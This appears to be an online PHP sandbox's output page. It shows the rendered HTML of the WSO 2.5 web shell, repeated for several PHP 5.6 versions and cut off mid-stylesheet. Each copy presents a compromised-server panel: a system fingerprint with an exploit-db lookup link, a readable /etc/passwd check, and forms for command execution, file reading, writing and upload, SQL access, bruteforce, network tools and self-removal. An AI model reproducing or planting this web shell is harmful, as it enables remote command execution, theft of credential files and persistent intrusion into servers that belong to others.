Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.6.20 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.6.19
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.6.19 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.6.18
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.6.18 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.6.17
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.6.17 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.6.16
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} 